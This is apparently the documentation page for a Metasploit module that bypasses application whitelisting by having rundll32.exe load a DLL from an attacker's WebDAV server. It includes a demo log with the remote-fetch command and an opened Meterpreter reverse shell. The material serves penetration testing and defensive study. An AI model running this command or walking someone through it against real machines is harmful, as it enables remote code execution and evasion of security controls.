CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Introduction

This module simplifies the rundll32.exe Application Whitelisting Bypass technique

The module creates a webdav server that hosts a dll file. When the user types the provided rundll32 command on a system, rundll32 will load the dll remotly and execute the provided export function.

The export function needs to be valid, but the default meterpreter function can be anything. The process does write the dll to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV but does not load the dll from that location. This file should be removed after execution.

The extension can be anything you'd like, but you don't have to use one. Two files will be written to disk. One named the requested name and one with a dll extension attached.

Please note that there is a slight delay for the target to start making WebDAV requests, and then getting a session back.

Demo

msf5 exploit(windows/misc/webdav_delivery) > run
[*] Exploit running as background job 3.

[*] Started reverse TCP handler on 172.16.249.1:4444 
msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\172.16.249.1@8080\ANYTHING,Init
[*] 172.16.249.130   webdav_delivery - GET /ANYTHING
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600

msf5 exploit(windows/misc/webdav_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  4         meterpreter x86/windows               172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130)

msf5 exploit(windows/misc/webdav_delivery) >